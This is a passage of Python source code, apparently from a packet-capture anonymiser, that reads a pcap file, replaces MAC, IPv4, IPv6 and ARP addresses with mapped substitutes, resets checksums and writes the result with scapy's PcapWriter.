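        # parse with pcapfile, re-emit with scapy's PcapWriter
        cap = savefile.load_savefile(capfile, verbose=False)
        pktwriter = PcapWriter(filepath_out, append=True)
        try:
            for pkt in cap.packets:
                new_pkt = Ether(pkt.raw())

                # Link-layer addresses.  Still best-effort as before, but
                # the bare `except:` is narrowed so KeyboardInterrupt and
                # SystemExit are not swallowed.
                try:
                    new_pkt.src = mac_gen.get_mac(new_pkt.src)
                    new_pkt.dst = mac_gen.get_mac(new_pkt.dst)
                except Exception:
                    pass

                # Network-layer addresses (a frame has at most one of these).
                if new_pkt.haslayer('IP'):
                    new_pkt['IP'].src = ip4_gen.get_ip(new_pkt['IP'].src)
                    new_pkt['IP'].dst = ip4_gen.get_ip(new_pkt['IP'].dst)
                if new_pkt.haslayer('IPv6'):
                    new_pkt['IPv6'].src = ip6_gen.get_ip(new_pkt['IPv6'].src)
                    new_pkt['IPv6'].dst = ip6_gen.get_ip(new_pkt['IPv6'].dst)

                # ARP bodies carry the real addresses too.
                if new_pkt.haslayer('ARP'):
                    arp = new_pkt['ARP']
                    arp.hwsrc = mac_gen.get_mac(arp.hwsrc)
                    arp.hwdst = mac_gen.get_mac(arp.hwdst)
                    arp.psrc = ip4_gen.get_ip(arp.psrc)
                    arp.pdst = ip4_gen.get_ip(arp.pdst)

                _reset_checksums(new_pkt)
                pktwriter.write(new_pkt)
        finally:
            pktwriter.close()

    if info:
        # Single-argument print() is valid on both Python 2 and 3.
        print('This file has %s IPv4/IPv6 endpoints and %s MAC endpoints' % (
            len(ip4_gen.mappings) + len(ip6_gen.mappings),
            len(mac_gen.mappings)))
        print('File created: \n%s' % filepath_out)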